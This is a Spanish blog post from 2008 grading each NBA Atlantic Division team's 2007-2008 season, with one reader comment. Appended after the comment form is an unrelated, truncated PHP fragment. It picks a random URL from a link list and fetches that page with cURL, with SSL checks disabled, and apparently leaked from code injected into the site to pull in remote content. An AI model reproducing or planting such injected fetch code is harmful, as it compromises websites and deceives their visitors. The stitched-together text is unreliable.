Haciendo balance (temporada 2007-2008): Atlantic

03 de September de 2008 por Jabho

Acabamos con la división del campeón y del mejor de la regular: Boston Celtics. Poca oposición encontró en una división donde el 2º apenas llegó al 50% de victorias. Por su parte los Knicks a los suyo. No por habitual deja de sorprender que año trás año parezca que tocan fondo y al poco desmuestren que no, que el fondo estaba mas abajo…

Boston Celtics: orgullo céltico

La formula puede parecer fácil y poco arriesgada: juntas 3 All Stars y campeón. Puede parecer fácil pero no lo es. No lo es porque primero hay que conseguir estrellas consagradas, que pese a lo visto esta campaña no se regalan. Luego hacer funcinar al equipo. Porque en el deporte de equipos sobran ejemplos de proyectos faraónicos con algunos de los mejores del deporte jugando juntos que deberían haber ganado y no lo hicieron. Esa es la clave de la victoria céltica: equipo.

Desde el principio Garnett, Pierce y Allen tuvieron claro que lo importante era ganar. Dejaron atrás sus egos de estrellas solitarias en equipos perdedores y pusieron su talento al servicio del equipo. Y funcionó. Cundió el ejemplo, se involucraron todos los jugadores e incluso se convenció a Cassel y a PJ Brown para que se sumaran a la lucha por el anillo.

Gran temporada de los Celtics. Dominaron la temporada regular con cierta facilidad gracias a un sensacional arranque y amparados en la gran defensa que lideró Garnett. En Play Offs fueron de menos a más: despistados contra Atlanta, sufriendo contra  Lebron y comodos contra los Pistons.

Una gran temporada se remata con una gran final, la soñada. La grandeza de tu rival da prestigio a tus victorias. Y una final hay que ganarla en el campo y en los recuerdos. El show de Pierce en el primero, la remontada del 4º o la paliza del 6º…

Matrícula para Boston por el resultado y por la forma de conseguirlo. Y notable para nuestro pronóstico.

Toronto Raptors: la importancia del pegamento

Algo así “Il Glue” que es la cola o el pegamento apodaban a Garbajosa en Treviso. Si algo se ha echado de menos en los Raptors este año, además de a Jorge, ha sido eso, el pegamento. Y es que Toronto ha jugado contra si mismo y su debate en la posición de base toda la temporada.

No han jugado una mala campaña los Raptors. Y eso “pesar de” las lesiones. Digo a pesar cuando en realidad es “gracias a”. TJ Ford tuvo una importante lesión que le mantuvo lejos de las canchas dfurante mucho tiempo. Tanto que Calderon, con minutos y confianza, explotó y le demostró a todo el mundo su verdadero nivel.

No debería ser un problema tener dos buenos jugadores aunque jueguen en la misma posición. Lo es cuando el ego de uno es muy grande y el entrenador no sabe manjarlo. No fue así y el equipo quedó deborado por el debate entre los bases.

Aprobado tirando a suspenso para su temporada. Al igual que para nuestra predicción.

Philadelphia 76ers: llenando la botella

No debe ser fácil tomar la decisión de cortar a Webber y traspasar a Iverson. Supone empezar casi de cero y el público de Philadelphia ha visto mucho y buen basket para tener paciencia. Pero, cosas de la vida, poco mas de un año después de tomar la decisión las dudas quedan despejadas.

Y es que las buenas sensaciones que dejaron los Sixers hace dos temporadas tras la marcha de Iverson se han visto confirmadas, e incluso superadas, la pasada temporada. 40 victorias, Play OIffs y buena imagen en la derrota ente los Pistons por 4-2 en 1ª ronda.

Como buenas sensaciones ha dejado Young en su año rookie. Andre Miller, Iguodala, Dalembert, Young y, a partir de ahora, Brand. Sin duda en Philadelphia van llenando la botella y la van llenando rápido.

Buena temporada para los Sixers y aprobado para nuestro pronóstico.

New Jersey Nets: cambio de rumbo

New Jersey llevaba unos años en mitad del camino, haciendo Play Offs, incluso 2ªs rondas pero sin optar realmente a luchar por el anillo. Con los 35 años de Kidd como sombra que se cernía sobre el proyecto, era hora de decidir si arriesgaban futuro por dar un pasito adelante o por el contrario daban un pasito atrás. Pero uno de los caminos es mas dificil de ejecutar y entraña mas riesgo…

Temporada tirada por tanto en New Jersey y toca travesia por el desierto. En el horizonte está el traslado a Brookling y el plan de liberar salario cuando King James acaba contrato. Y confiar en la amistad de Lebron con Jay Z.

Suspenso para los Nets y también para nuestro pronóstico. Podría haber sido, si hubieran escogido el camino dificil, pero no fue.

New York Knicks: haciendo el ridículo… nuevamente

Si bien es cierto que hace 2 temporadas los Knicks mostraron algún sintoma de vida, no se esparaba una gran campaña de ellos. Nada de luchar como favorito por el anillo, ni de ser un outsider en Play Offs. Ni siquiera enamorar con su juego aunque los resultados no acompañaran.

Pero aun con el listón tan bajo los Knicks siguen defraudando a propios y extraños, haciendo el ridículo con la que año tras año es la plantilla de jugadores mejor pagada de la liga. 23 victorias, 58 derrotas y penúltimo en el Este con casi 100$ en salarios. Tremendo.

Se podría destacar en los deportivo el buen nivel de Crawford,  el trabajo de Lee o incluso algunos detalles del rookie Chandler en el tramo final. Pero no merece la pena. La temporada de los Knicks es, un año más, desastrosa y lo mejor para sus aficionados es que ya ha pasado.

Pero si merece la pena destacar el despido de Isiah Thomas. Pocos GM o entrenadores, el ocupaba ambos puestos, han hecho tanto daño al equipo que les pagaba como Thomas. Se va con una larga lista de errores a sus espaldas y dejando a la franquicia con las manos atadas para los próximos años.

Hay que mirar adelante y pensar que la franquicia queda, ahora si, en buenas manos. Sobresaliente a esta decisión. Y bien nuestro pronóstico que ya avanzó las claves y los porqués. Lo raro es que no lo vieran venir en la Gran Manzana.

Comenta

Un comentario a esta entrada

  1. TheDeerHunter dice:
    #1

    De los Knicks… hombre, yo creo que ya podemos decir que han tocado fondo ¿no???
    Mucho mérito tendrían que lograran superar la que han hecho esta temporada y esta vez sin I.Thomas…
    Vaya crack. Vamos a ver quien es el degenerado que lo vuelve a fichar, que con lo absurdo de algunas decisiones que toman los altos capos de la NBA no os extrañe nada que pase más pronto de lo que pensamos (y por dios… que no sea Jerry Buss)

    NwJersey. Pues teniendo en cuenta que ya estaba claro que se les había pasado el arroz parece que era el momento y la jugada no les salió del todo mal en ese trade. Precísamente, con Philadelphia tienen un espejo cercano en el que mirarse.

    Los Toronto hay que ver… en realidad no han hecho mucho más ni mucho menos de lo que esperábamos todos iban a hacer pero todos los damos como un fracaso. El problema es la imagen que han dejado con lo bien que habían ido construyendo hasta ese momento. Yo creo que, al menos, han tomado alguna que otra buena decisión este verano.

    Los Verdes… bien por ellos. Mucho mérito aunque muchos los dabais como favoritos desde el principio. No sólo hay que ser capaz de ganar sino de saber hacerlo con estilo. Qué ejemplo han dado a todo el mundo.
    Ya los pillaremos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>